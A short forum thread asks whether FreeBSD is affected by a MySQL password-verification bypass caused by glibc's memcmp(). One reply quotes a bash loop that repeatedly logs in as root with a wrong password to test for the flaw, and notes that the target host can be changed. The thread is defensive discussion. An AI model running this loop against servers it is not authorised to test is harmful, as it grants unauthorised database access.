MySQL vulnerability allows attackers to bypass password verification

[frijsdijk]

Ref:

http://www.csoonline.com/article/70...ows-attackers-to-bypass-password-verification
http://seclists.org/nmap-dev/2012/q2/679

Question: can anyone confirm that FreeBSD is not vulnerable to this bug?

 

[kpa]

Look at the version numbers of MySQL server ports in the ports tree and compare them to the version numbers in the linked articles...

 

[Anonymous]

Ref:

http://www.csoonline.com/article/70...ows-attackers-to-bypass-password-verification
http://seclists.org/nmap-dev/2012/q2/679

Question: can anyone confirm that FreeBSD is not vulnerable to this bug?

According to an article on The H, this is a problem of the memcmp() function in the SSE-optimised glibc of several Linux distributions, and the article tells further that "the GCC built in memcmp and BSD libc memcmp are safe".

The German counterpart of said article on Heise-Online provides a simple terminal command to check for the vulnerability on localhost:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

If this comes up with the mysql prompt, then the server is vulnerable. You may want to change the -u and -h options for checking other users/servers.

Best regards

Rolf